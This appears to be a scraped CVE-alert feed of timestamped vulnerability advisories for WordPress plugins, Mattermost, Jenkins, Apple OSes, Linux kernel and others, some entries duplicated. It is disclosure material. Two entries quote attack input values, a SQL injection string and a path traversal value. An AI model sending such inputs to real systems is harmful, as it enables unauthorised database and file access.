🚨 CVE-2022-48618The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.1, watchOS 9.2, iOS 16.2 and iPadOS 16.2, tvOS 16.2. An attacker with arbitrary read and write capability may be able to bypass Pointer Authentication. Apple is aware of a report that this issue may have been exploited against versions of iOS released before iOS 15.7.1.🎖@cveNotify |
|
| 2024-02-29 17:37:26 |
🚨 CVE-2024-20765Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-02-29 15:37:25 |
🚨 CVE-2023-52485In the Linux kernel, the following vulnerability has been resolved:drm/amd/display: Wake DMCUB before sending a command[Why]We can hang in place trying to send commands when the DMCUB isn'tpowered on.[How]For functions that execute within a DC context or DC lock we canwrap the direct calls to dm_execute_dmub_cmd/list with code thatexits idle power optimizations and reallows once we're done withthe command submission on success.For DM direct submissions the DM will need to manage the enter/exitsequencing manually.We cannot invoke a DMCUB command directly within the DM executionhelper or we can deadlock.🎖@cveNotify |
|
| 2024-02-29 15:37:24 |
🚨 CVE-2024-1163Uncontrolled Resource Consumption in GitHub repository mbloch/mapshaper prior to 0.6.44.🎖@cveNotify |
|
| 2024-02-29 14:08:16 |
🚨 CVE-2024-25170An issue in Mezzanine v6.0.0 allows attackers to bypass access controls via manipulating the Host header.🎖@cveNotify |
|
| 2024-02-29 14:08:15 |
🚨 CVE-2024-25169An issue in Mezzanine v6.0.0 allows attackers to bypass access control mechanisms in the admin panel via a crafted request.🎖@cveNotify |
|
| 2024-02-29 14:08:14 |
🚨 CVE-2024-24148A memory leak issue discovered in parseSWF_FREECHARACTER in libming v0.4.8 allows attackers to cause a denial of service via a crafted SWF file.🎖@cveNotify |
|
| 2024-02-29 14:08:13 |
🚨 CVE-2023-52047Dedecms v5.7.112 was discovered to contain a Cross-Site Request Forgery (CSRF) in the file manager.🎖@cveNotify |
|
| 2024-02-29 14:08:09 |
🚨 CVE-2024-27948Cross-Site Request Forgery (CSRF) vulnerability in bytesforall Atahualpa.This issue affects Atahualpa: from n/a through 3.7.24.🎖@cveNotify |
|
| 2024-02-29 14:08:08 |
🚨 CVE-2023-51692Missing Authorization vulnerability in CusRev Customer Reviews for WooCommerce.This issue affects Customer Reviews for WooCommerce: from n/a through 5.38.1.🎖@cveNotify |
|
| 2024-02-29 14:08:07 |
🚨 CVE-2024-27103Querybook is a Big Data Querying UI. When a user searches for their queries, datadocs, tables and lists, the search result is marked and highlighted, and this feature uses dangerouslySetInnerHTML which means that if the highlighted result has an XSS payload it will trigger. While the input to dangerouslySetInnerHTML is not sanitized for the data inside of queries which leads to an XSS vulnerability. During the "query auto-suggestion" the name of the suggested tables are set with innerHTML which leads to the XSS vulnerability. A patch to rectify this issue has been introduced in Querybook version 3.31.2.🎖@cveNotify |
|
| 2024-02-29 14:08:06 |
🚨 CVE-2024-26342A Null pointer dereference in usr/sbin/httpd in ASUS AC68U 3.0.0.4.384.82230 allows remote attackers to trigger DoS via network packet.🎖@cveNotify |
|
| 2024-02-29 14:08:03 |
🚨 CVE-2024-1847Heap-based Buffer Overflow, Memory Corruption, Out-Of-Bounds Read, Out-Of-Bounds Write, Stack-based Buffer Overflow, Type Confusion, Uninitialized Variable, Use-After-Free vulnerabilities exist in the file reading procedure in eDrawings from Release SOLIDWORKS 2023 through Release SOLIDWORKS 2024. These vulnerabilities could allow an attacker to execute arbitrary code while opening a specially crafted CATPART, DWG, DXF, IPT, JT, SAT, SLDDRW, SLDPRT, STL, STP, X_B or X_T file.🎖@cveNotify |
|
| 2024-02-29 14:08:02 |
🚨 CVE-2023-52226Cross-Site Request Forgery (CSRF) vulnerability in Advanced Flamingo.This issue affects Advanced Flamingo: from n/a through 1.0.🎖@cveNotify |
|
| 2024-02-29 14:08:01 |
🚨 CVE-2023-52223Cross-Site Request Forgery (CSRF) vulnerability in MailerLite MailerLite – WooCommerce integration.This issue affects MailerLite – WooCommerce integration: from n/a through 2.0.8.🎖@cveNotify |
|
| 2024-02-29 14:07:58 |
🚨 CVE-2023-51683Cross-Site Request Forgery (CSRF) vulnerability in Scott Paterson Easy PayPal & Stripe Buy Now Button.This issue affects Easy PayPal & Stripe Buy Now Button: from n/a through 1.8.1.🎖@cveNotify |
|
| 2024-02-29 14:07:57 |
🚨 CVE-2024-24702Cross-Site Request Forgery (CSRF) vulnerability in Matt Martz & Andy Stratton Page Restrict.This issue affects Page Restrict: from n/a through 2.5.5.🎖@cveNotify |
|
| 2024-02-29 14:07:56 |
🚨 CVE-2023-6917A vulnerability has been identified in the Performance Co-Pilot (PCP) package, stemming from the mixed privilege levels utilized by systemd services associated with PCP. While certain services operate within the confines of limited PCP user/group privileges, others are granted full root privileges. This disparity in privilege levels poses a risk when privileged root processes interact with directories or directory trees owned by unprivileged PCP users. Specifically, this vulnerability may lead to the compromise of PCP user isolation and facilitate local PCP-to-root exploits, particularly through symlink attacks. These vulnerabilities underscore the importance of maintaining robust privilege separation mechanisms within PCP to mitigate the potential for unauthorized privilege escalation.🎖@cveNotify |
|
| 2024-02-29 12:37:33 |
🚨 CVE-2024-26607In the Linux kernel, the following vulnerability has been resolved:drm/bridge: sii902x: Fix probing race issueA null pointer dereference crash has been observed rarely on TIplatforms using sii9022 bridge:[ 53.271356] sii902x_get_edid+0x34/0x70 [sii902x][ 53.276066] sii902x_bridge_get_edid+0x14/0x20 [sii902x][ 53.281381] drm_bridge_get_edid+0x20/0x34 [drm][ 53.286305] drm_bridge_connector_get_modes+0x8c/0xcc [drm_kms_helper][ 53.292955] drm_helper_probe_single_connector_modes+0x190/0x538 [drm_kms_helper][ 53.300510] drm_client_modeset_probe+0x1f0/0xbd4 [drm][ 53.305958] __drm_fb_helper_initial_config_and_unlock+0x50/0x510 [drm_kms_helper][ 53.313611] drm_fb_helper_initial_config+0x48/0x58 [drm_kms_helper][ 53.320039] drm_fbdev_dma_client_hotplug+0x84/0xd4 [drm_dma_helper][ 53.326401] drm_client_register+0x5c/0xa0 [drm][ 53.331216] drm_fbdev_dma_setup+0xc8/0x13c [drm_dma_helper][ 53.336881] tidss_probe+0x128/0x264 [tidss][ 53.341174] platform_probe+0x68/0xc4[ 53.344841] really_probe+0x188/0x3c4[ 53.348501] __driver_probe_device+0x7c/0x16c[ 53.352854] driver_probe_device+0x3c/0x10c[ 53.357033] __device_attach_driver+0xbc/0x158[ 53.361472] bus_for_each_drv+0x88/0xe8[ 53.365303] __device_attach+0xa0/0x1b4[ 53.369135] device_initial_probe+0x14/0x20[ 53.373314] bus_probe_device+0xb0/0xb4[ 53.377145] deferred_probe_work_func+0xcc/0x124[ 53.381757] process_one_work+0x1f0/0x518[ 53.385770] worker_thread+0x1e8/0x3dc[ 53.389519] kthread+0x11c/0x120[ 53.392750] ret_from_fork+0x10/0x20The issue here is as follows:- tidss probes, but is deferred as sii902x is still missing.- sii902x starts probing and enters sii902x_init().- sii902x calls drm_bridge_add(). Now the sii902x bridge is ready from DRM's perspective.- sii902x calls sii902x_audio_codec_init() and platform_device_register_data()- The registration of the audio platform device causes probing of the deferred devices.- tidss probes, which eventually causes sii902x_bridge_get_edid() to be called.- sii902x_bridge_get_edid() tries to use the i2c to read the edid. However, the sii902x driver has not set up the i2c part yet, leading to the crash.Fix this by moving the drm_bridge_add() to the end of thesii902x_init(), which is also at the very end of sii902x_probe().🎖@cveNotify |
|
| 2024-02-29 11:37:30 |
🚨 CVE-2024-1953Mattermost versions 8.1.x before 8.1.9, 9.2.x before 9.2.5, 9.3.0, and 9.4.x before 9.4.2 fail to limit the number of role names requested from the API, allowing an authenticated attacker to cause the server to run out of memory and crash by issuing an unusually large HTTP request.🎖@cveNotify |
|
| 2024-02-29 11:37:26 |
🚨 CVE-2024-1949A race condition in Mattermost versions 8.1.x before 8.1.9, and 9.4.x before 9.4.2 allows an authenticated attacker to gain unauthorized access to individual posts' contents via carefully timed post creation while another user deletes posts.🎖@cveNotify |
|
| 2024-02-29 11:37:25 |
🚨 CVE-2024-23898Jenkins 2.217 through 2.441 (both inclusive), LTS 2.222.1 through 2.426.2 (both inclusive) does not perform origin validation of requests made through the CLI WebSocket endpoint, resulting in a cross-site WebSocket hijacking (CSWSH) vulnerability, allowing attackers to execute CLI commands on the Jenkins controller.🎖@cveNotify |
|
| 2024-02-29 11:37:24 |
🚨 CVE-2024-23897Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.🎖@cveNotify |
|
| 2024-02-29 10:37:53 |
🚨 CVE-2024-1619Kaspersky has fixed a security issue in the Kaspersky Security 8.0 for Linux Mail Server. The issue was that an attacker could potentially force an administrator to click on a malicious link to perform unauthorized actions.🎖@cveNotify |
|
| 2024-02-29 09:37:26 |
🚨 CVE-2024-1877A vulnerability was found in SourceCodester Employee Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /cancel.php. The manipulation of the argument id with the input 1%20or%201=1 leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254725 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-29 09:37:25 |
🚨 CVE-2024-1871A vulnerability, which was classified as problematic, was found in SourceCodester Employee Management System 1.0. Affected is an unknown function of the file /process/assignp.php of the component Project Assignment Report. The manipulation of the argument pname leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-254694 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-29 08:37:26 |
🚨 CVE-2024-23493Mattermost fails to properly authorize the requests fetching team associated AD/LDAP groups, allowing a user to fetch details of AD/LDAP groups of a team that they are not a member of.🎖@cveNotify |
|
| 2024-02-29 08:37:25 |
🚨 CVE-2024-1887Mattermost fails to check if compliance export is enabled when fetching posts of public channels allowing a user that is not a member of the public channel to fetch the posts, which will not be audited in the compliance export.🎖@cveNotify |
|
| 2024-02-29 08:37:24 |
🚨 CVE-2024-23222A type confusion issue was addressed with improved checks. This issue is fixed in tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3, macOS Ventura 13.6.4, macOS Monterey 12.7.3, visionOS 1.0.2. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited.🎖@cveNotify |
|
| 2024-02-29 07:37:37 |
🚨 CVE-2024-25594Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Savvy Wordpress Development MyWaze allows Stored XSS.This issue affects MyWaze: from n/a through 1.6.🎖@cveNotify |
|
| 2024-02-29 07:37:36 |
🚨 CVE-2024-25291Deskfiler v1.2.3 allows attackers to execute arbitrary code via uploading a crafted plugin.🎖@cveNotify |
|
| 2024-02-29 07:37:31 |
🚨 CVE-2024-1981The Migration, Backup, Staging – WPvivid plugin for WordPress is vulnerable to SQL Injection via the 'table_prefix' parameter in version 0.9.68 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-02-29 07:37:30 |
🚨 CVE-2024-1885This vulnerability allows remote attackers to execute arbitrary code on the affected webOS of LG Signage.🎖@cveNotify |
|
| 2024-02-29 06:37:25 |
🚨 CVE-2023-47874Missing Authorization vulnerability in Perfmatters.This issue affects Perfmatters: from n/a through 2.1.6.🎖@cveNotify |
|
| 2024-02-29 06:37:24 |
🚨 CVE-2023-1841Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Honeywell MPA2 Access Panel (Web server modules) allows XSS Using Invalid Characters.This issue affects MPA2 Access Panel all version prior to R1.00.08.05. Honeywell released firmware update package MPA2 firmware R1.00.08.05 which addresses this vulnerability. This version and all later versionscorrect the reported vulnerability.🎖@cveNotify |
|
| 2024-02-29 05:37:32 |
🚨 CVE-2024-1341The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's advanced_iframe shortcode in all versions up to, and including, 2024.1 due to the plugin allowing users to include JS files from external sources through the additional_js attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-02-29 05:37:26 |
🚨 CVE-2023-51696Cross-Site Request Forgery (CSRF) vulnerability in СleanTalk - Anti-Spam Protection Spam protection, Anti-Spam, FireWall by CleanTalk.This issue affects Spam protection, Anti-Spam, FireWall by CleanTalk: from n/a through 6.20.🎖@cveNotify |
|
| 2024-02-29 05:37:25 |
🚨 CVE-2023-51529Cross-Site Request Forgery (CSRF) vulnerability in HasThemes HT Mega – Absolute Addons For Elementor.This issue affects HT Mega – Absolute Addons For Elementor: from n/a through 2.3.3.🎖@cveNotify |
|
| 2024-02-29 05:37:24 |
🚨 CVE-2023-51528Cross-Site Request Forgery (CSRF) vulnerability in Senol Sahin AI Power: Complete AI Pack – Powered by GPT-4.This issue affects AI Power: Complete AI Pack – Powered by GPT-4: from n/a through 1.8.12.🎖@cveNotify |
|
| 2024-02-29 04:37:30 |
🚨 CVE-2024-1468The Avada | Website Builder For WordPress & WooCommerce theme for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the ajax_import_options() function in all versions up to, and including, 7.11.4. This makes it possible for authenticated attackers, with contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-02-29 03:37:41 |
🚨 CVE-2024-0689The Custom Field Suite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a meta import in all versions up to, and including, 2.6.4 due to insufficient input sanitization and output escaping on the meta values. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2024-02-29 03:37:40 |
🚨 CVE-2024-25982The link to update all installed language packs did not include the necessary token to prevent a CSRF risk.🎖@cveNotify |
|
| 2024-02-29 03:37:39 |
🚨 CVE-2024-25981Separate Groups mode restrictions were not honored when performing a forum export, which would export forum data for all groups. By default this only provided additional access to non-editing teachers.🎖@cveNotify |
|
| 2024-02-29 03:37:36 |
🚨 CVE-2024-25980Separate Groups mode restrictions were not honored in the H5P attempts report, which would display users from other groups. By default this only provided additional access to non-editing teachers.🎖@cveNotify |
|
| 2024-02-29 03:37:35 |
🚨 CVE-2024-25978Insufficient file size checks resulted in a denial of service risk in the file picker's unzip functionality.🎖@cveNotify |
|
| 2024-02-29 03:37:34 |
🚨 CVE-2023-50387Certain DNSSEC aspects of the DNS protocol (in RFC 4033, 4034, 4035, 6840, and related RFCs) allow remote attackers to cause a denial of service (CPU consumption) via one or more DNSSEC responses, aka the "KeyTrap" issue. One of the concerns is that, when there is a zone with many DNSKEY and RRSIG records, the protocol specification implies that an algorithm must evaluate all combinations of DNSKEY and RRSIG records.🎖@cveNotify |
|
| 2024-02-29 02:37:32 |
🚨 CVE-2024-22871An issue in Clojure versions 1.20 to 1.12.0-alpha5 allows an attacker to cause a denial of service (DoS) via the clojure.core$partial$fn__5920 function.🎖@cveNotify |
|
| 2024-02-29 02:37:25 |
🚨 CVE-2023-51800Cross Site Scripting (XSS) vulnerability in School Fees Management System v.1.0 allows a remote attacker to execute arbitrary code via a crafted payload to the main_settings component in the phone, address, bank, acc_name, acc_number parameters, new_class and cname parameter, add_new_parent function in the name email parameters, new_term function in the tname parameter, and the edit_student function in the name parameter.🎖@cveNotify |
|
| 2024-02-29 02:37:24 |
🚨 CVE-2023-27545IBM Watson CloudPak for Data Data Stores information disclosure 4.6.0 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 248947.🎖@cveNotify |
|
| 2024-02-29 02:07:46 |
🚨 CVE-2023-1467A vulnerability classified as critical has been found in SourceCodester Student Study Center Desk Management System 1.0. Affected is an unknown function of the file Master.php?f=delete_img of the component POST Parameter Handler. The manipulation of the argument path with the input C%3A%2Ffoo.txt leads to path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-223326 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-29 02:07:39 |
🚨 CVE-2023-1464A vulnerability, which was classified as critical, was found in SourceCodester Medicine Tracker System 1.0. This affects an unknown part of the file Users.php?f=save_user. The manipulation of the argument firstname/middlename/lastname/username/password leads to improper authentication. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-223311.🎖@cveNotify |
|
| 2024-02-29 02:07:38 |
🚨 CVE-2023-1460A vulnerability was found in SourceCodester Online Pizza Ordering System 1.0. It has been classified as critical. This affects an unknown part of the file admin/ajax.php?action=save_user of the component Password Change Handler. The manipulation leads to improper authentication. It is possible to initiate the attack remotely. The identifier VDB-223305 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-29 02:07:37 |
🚨 CVE-2023-1459A vulnerability was found in SourceCodester Canteen Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file changeUsername.php. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223304.🎖@cveNotify |
|
| 2024-02-29 01:07:25 |
🚨 CVE-2006-10001A vulnerability, which was classified as problematic, was found in Subscribe to Comments Plugin up to 2.0.7 on WordPress. This affects an unknown part of the file subscribe-to-comments.php. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 2.0.8 is able to address this issue. The identifier of the patch is 9683bdf462fcac2f32b33be98f0b96497fbd1bb6. It is recommended to upgrade the affected component. The identifier VDB-222321 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-29 00:37:27 |
🚨 CVE-2024-26141Rack is a modular Ruby web server interface. Carefully crafted Range headers can cause a server to respond with an unexpectedly large response. Responding with such large responses could lead to a denial of service issue. Vulnerable applications will use the `Rack::File` middleware or the `Rack::Utils.byte_ranges` methods (this includes Rails applications). The vulnerability is fixed in 3.0.9.1 and 2.2.8.1.🎖@cveNotify |
|
| 2024-02-29 00:37:26 |
🚨 CVE-2024-25126Rack is a modular Ruby web server interface. Carefully crafted content type headers can cause Rack’s media type parser to take much longer than expected, leading to a possible denial of service vulnerability (ReDos 2nd degree polynomial). This vulnerability is patched in 3.0.9.1 and 2.2.8.1.🎖@cveNotify |
|
| 2024-02-28 23:37:31 |
🚨 CVE-2024-26559An issue in uverif v.2.0 allows a remote attacker to obtain sensitive information.🎖@cveNotify |
|
| 2024-02-28 23:37:30 |
🚨 CVE-2024-25422SQL Injection vulnerability in SEMCMS v.4.8 allows a remote attacker to execute arbitrary code and obtain sensitive information via the SEMCMS_Menu.php component.🎖@cveNotify |
|
| 2024-02-28 23:37:29 |
🚨 CVE-2024-23910Cross-site request forgery (CSRF) vulnerability in ELECOM wireless LAN routers allows a remote unauthenticated attacker to hijack the authentication of administrators and to perform unintended operations to the affected product. Affected products and versions are as follows: WRC-1167GS2-B v1.67 and earlier, WRC-1167GS2H-B v1.67 and earlier, WRC-2533GS2-B v1.62 and earlier, WRC-2533GS2-W v1.62 and earlier, and WRC-2533GS2V-B v1.62 and earlier.🎖@cveNotify |
|
| 2024-02-28 23:37:26 |
🚨 CVE-2024-21798ELECOM wireless LAN routers contain a cross-site scripting vulnerability. Assume that a malicious administrative user configures the affected product with specially crafted content. When another administrative user logs in and operates the product, an arbitrary script may be executed on the web browser. Affected products and versions are as follows: WRC-1167GS2-B v1.67 and earlier, WRC-1167GS2H-B v1.67 and earlier, WRC-2533GS2-B v1.62 and earlier, WRC-2533GS2-W v1.62 and earlier, and WRC-2533GS2V-B v1.62 and earlier.🎖@cveNotify |
|
| 2024-02-28 23:37:25 |
🚨 CVE-2024-21374Microsoft Teams for Android Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-02-28 23:37:24 |
🚨 CVE-2023-40072OS command injection vulnerability in ELECOM network devices allows an authenticated user to execute an arbitrary OS command by sending a specially crafted request. Affected products and versions are as follows: WAB-S600-PS all versions, WAB-S300 all versions, WAB-M1775-PS v1.1.21 and earlier, WAB-S1775 v1.1.9 and earlier, WAB-S1167 v1.0.7 and earlier, and WAB-M2133 v1.3.22 and earlier.🎖@cveNotify |
|
| 2024-02-28 22:37:37 |
🚨 CVE-2024-26450Cross Site Scripting vulnerability in Piwigo before v.14.2.0 allows a remote attacker to escalate privileges via the batch function on the admin page.🎖@cveNotify |
|
| 2024-02-28 22:37:36 |
🚨 CVE-2024-25867A SQL Injection vulnerability in CodeAstro Membership Management System in PHP v.1.0 allows a remote attacker to execute arbitrary SQL commands via the membershipType and membershipAmount parameters in the add_type.php component.🎖@cveNotify |
|
| 2024-02-28 22:37:32 |
🚨 CVE-2024-25866A SQL Injection vulnerability in CodeAstro Membership Management System in PHP v.1.0 allows a remote attacker to execute arbitrary SQL commands via the email parameter in the index.php component.🎖@cveNotify |
|
| 2024-02-28 22:37:31 |
🚨 CVE-2024-22983SQL injection vulnerability in Projectworlds Visitor Management System in PHP v.1.0 allows a remote attacker to escalate privileges via the name parameter in the myform.php endpoint.🎖@cveNotify |
|
| 2024-02-28 22:37:30 |
🚨 CVE-2024-1972A vulnerability was found in SourceCodester Online Job Portal 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /Employer/EditProfile.php. The manipulation of the argument Address leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255128.🎖@cveNotify |
|
| 2024-02-28 22:37:27 |
🚨 CVE-2023-49338Couchbase Server 7.1.x and 7.2.x before 7.2.4 does not require authentication for the /admin/stats and /admin/vitals endpoints on TCP port 8093 of localhost.🎖@cveNotify |
|
| 2024-02-28 22:37:26 |
🚨 CVE-2023-45859In Hazelcast through 4.1.10, 4.2 through 4.2.8, 5.0 through 5.0.5, 5.1 through 5.1.7, 5.2 through 5.2.4, and 5.3 through 5.3.2, some client operations don't check permissions properly, allowing authenticated users to access data stored in the cluster.🎖@cveNotify |
|
| 2024-02-28 22:37:25 |
🚨 CVE-2023-25925IBM Security Guardium Key Lifecycle Manager 3.0, 3.0.1, 4.0, 4.1, and 4.1.1 could allow a remote authenticated attacker to execute arbitrary commands on the system by sending a specially crafted request. IBM X-Force ID: 247632.🎖@cveNotify |
|
| 2024-02-28 22:37:24 |
🚨 CVE-2023-25922IBM Security Guardium Key Lifecycle Manager 3.0, 3.0.1, 4.0, 4.1, and 4.1.1 allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. IBM X-Force ID: 247621.🎖@cveNotify |
|
| 2024-02-28 20:37:31 |
🚨 CVE-2024-27285YARD is a Ruby Documentation tool. The "frames.html" file within the Yard Doc's generated documentation is vulnerable to Cross-Site Scripting (XSS) attacks due to inadequate sanitization of user input within the JavaScript segment of the "frames.erb" template file. This vulnerability is fixed in 0.9.35.🎖@cveNotify |
|
| 2024-02-28 20:37:30 |
🚨 CVE-2024-25202Cross Site Scripting vulnerability in Phpgurukul User Registration & Login and User Management System 1.0 allows attackers to run arbitrary code via the search bar.🎖@cveNotify |
|
| 2024-02-28 20:37:26 |
🚨 CVE-2024-25169An issue in Mezzanine v6.0.0 allows attackers to bypass access control mechanisms in the admin panel via a crafted request.🎖@cveNotify |
|
| 2024-02-28 20:37:25 |
🚨 CVE-2023-52048RuoYi v4.7.8 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /system/notice/.🎖@cveNotify |
|
| 2024-02-28 20:37:24 |
🚨 CVE-2023-52047Dedecms v5.7.112 was discovered to contain a Cross-Site Request Forgery (CSRF) in the file manager.🎖@cveNotify |
|
| 2024-02-28 19:37:39 |
🚨 CVE-2024-27948Cross-Site Request Forgery (CSRF) vulnerability in bytesforall Atahualpa.This issue affects Atahualpa: from n/a through 3.7.24.🎖@cveNotify |
|
| 2024-02-28 19:37:38 |
🚨 CVE-2023-51533Cross-Site Request Forgery (CSRF) vulnerability in Ecwid Ecommerce Ecwid Ecommerce Shopping Cart.This issue affects Ecwid Ecommerce Shopping Cart: from n/a through 6.12.4.🎖@cveNotify |
|
| 2024-02-28 18:37:30 |
🚨 CVE-2024-1847Heap-based Buffer Overflow, Memory Corruption, Out-Of-Bounds Read, Out-Of-Bounds Write, Stack-based Buffer Overflow, Type Confusion, Uninitialized Variable, Use-After-Free vulnerabilities exist in the file reading procedure in eDrawings from Release SOLIDWORKS 2023 through Release SOLIDWORKS 2024. These vulnerabilities could allow an attacker to execute arbitrary code while opening a specially crafted CATPART, DWG, DXF, IPT, JT, SAT, SLDDRW, SLDPRT, STL, STP, X_B or X_T file.🎖@cveNotify |
|
| 2024-02-28 18:07:28 |
🚨 CVE-2023-41784Permissions and Access Control Vulnerability in ZTE Red Magic 8 Pro🎖@cveNotify |
|
| 2024-02-28 17:37:32 |
🚨 CVE-2024-21749Cross-Site Request Forgery (CSRF) vulnerability in Atakan Au 1 click disable all.This issue affects 1 click disable all: from n/a through 1.0.1.🎖@cveNotify |
|
| 2024-02-28 17:37:25 |
🚨 CVE-2023-52223Cross-Site Request Forgery (CSRF) vulnerability in MailerLite MailerLite – WooCommerce integration.This issue affects MailerLite – WooCommerce integration: from n/a through 2.0.8.🎖@cveNotify |
|
| 2024-02-28 17:37:24 |
🚨 CVE-2023-51681Cross-Site Request Forgery (CSRF) vulnerability in Duplicator Duplicator – WordPress Migration & Backup Plugin.This issue affects Duplicator – WordPress Migration & Backup Plugin: from n/a through 1.5.7.🎖@cveNotify |
|
| 2024-02-28 17:07:24 |
🚨 CVE-2024-24806libuv is a multi-platform support library with a focus on asynchronous I/O. The `uv_getaddrinfo` function in `src/unix/getaddrinfo.c` (and its windows counterpart `src/win/getaddrinfo.c`), truncates hostnames to 256 characters before calling `getaddrinfo`. This behavior can be exploited to create addresses like `0x00007f000001`, which are considered valid by `getaddrinfo` and could allow an attacker to craft payloads that resolve to unintended IP addresses, bypassing developer checks. The vulnerability arises due to how the `hostname_ascii` variable (with a length of 256 bytes) is handled in `uv_getaddrinfo` and subsequently in `uv__idna_toascii`. When the hostname exceeds 256 characters, it gets truncated without a terminating null byte. As a result attackers may be able to access internal APIs or for websites (similar to MySpace) that allows users to have `username.example.com` pages. Internal services that crawl or cache these user pages can be exposed to SSRF attacks if a malicious user chooses a long vulnerable username. This issue has been addressed in release version 1.48.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-02-28 15:07:44 |
🚨 CVE-2023-41784Permissions and Access Control Vulnerability in ZTE Red Magic 8 Pro🎖@cveNotify |
|
| 2024-02-28 14:37:35 |
🚨 CVE-2023-6572Command Injection in GitHub repository gradio-app/gradio prior to main.🎖@cveNotify |
|
| 2024-02-28 14:08:08 |
🚨 CVE-2023-48682Stored cross-site scripting (XSS) vulnerability in unit name. The following products are affected: Acronis Cyber Protect 16 (Linux, Windows) before build 37391.🎖@cveNotify |
|
| 2024-02-28 14:08:07 |
🚨 CVE-2023-48680Sensitive information disclosure due to excessive collection of system information. The following products are affected: Acronis Cyber Protect 16 (macOS, Windows) before build 37391.🎖@cveNotify |
|
| 2024-02-28 14:08:06 |
🚨 CVE-2023-48678Sensitive information disclosure due to insecure folder permissions. The following products are affected: Acronis Cyber Protect 16 (Linux, Windows) before build 37391.🎖@cveNotify |
|
| 2024-02-28 14:08:02 |
🚨 CVE-2024-27508Atheme 7.2.12 contains a memory leak vulnerability in /atheme/src/crypto-benchmark/main.c.🎖@cveNotify |
|
| 2024-02-28 14:08:01 |
🚨 CVE-2024-26144Rails is a web-application framework. Starting with version 5.2.0, there is a possible sensitive session information leak in Active Storage. By default, Active Storage sends a Set-Cookie header along with the user's session cookie when serving blobs. It also sets Cache-Control to public. Certain proxies may cache the Set-Cookie, leading to an information leak. The vulnerability is fixed in 7.0.8.1 and 6.1.7.7.🎖@cveNotify |
|
| 2024-02-28 14:08:00 |
🚨 CVE-2024-26142Rails is a web-application framework. Starting in version 7.1.0, there is a possible ReDoS vulnerability in the Accept header parsing routines of Action Dispatch. This vulnerability is patched in 7.1.3.1. Ruby 3.2 has mitigations for this problem, so Rails applications using Ruby 3.2 or newer are unaffected.🎖@cveNotify |
|
| 2024-02-28 14:07:56 |
🚨 CVE-2024-25399Subrion CMS 4.2.1 is vulnerable to Cross Site Scripting (XSS) via adminer.php.🎖@cveNotify |
|
| 2024-02-28 14:07:55 |
🚨 CVE-2024-25398In Srelay (the SOCKS proxy and Relay) v.0.4.8p3, a specially crafted network payload can trigger a denial of service condition and disrupt the service.🎖@cveNotify |
|
| 2024-02-28 14:07:54 |
🚨 CVE-2024-1922A vulnerability has been found in SourceCodester Online Job Portal 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /Employer/ManageJob.php of the component Manage Job Page. The manipulation of the argument Qualification/Description leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254857 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-28 14:07:50 |
🚨 CVE-2024-27905** UNSUPPORTED WHEN ASSIGNED ** Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Aurora.An endpoint exposing internals to unauthenticated users can be used as a "padding oracle" allowing an anonymous attacker to construct a valid authentication cookie. Potentially this could be combined with vulnerabilities in other components to achieve remote code execution.As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-02-28 14:07:49 |
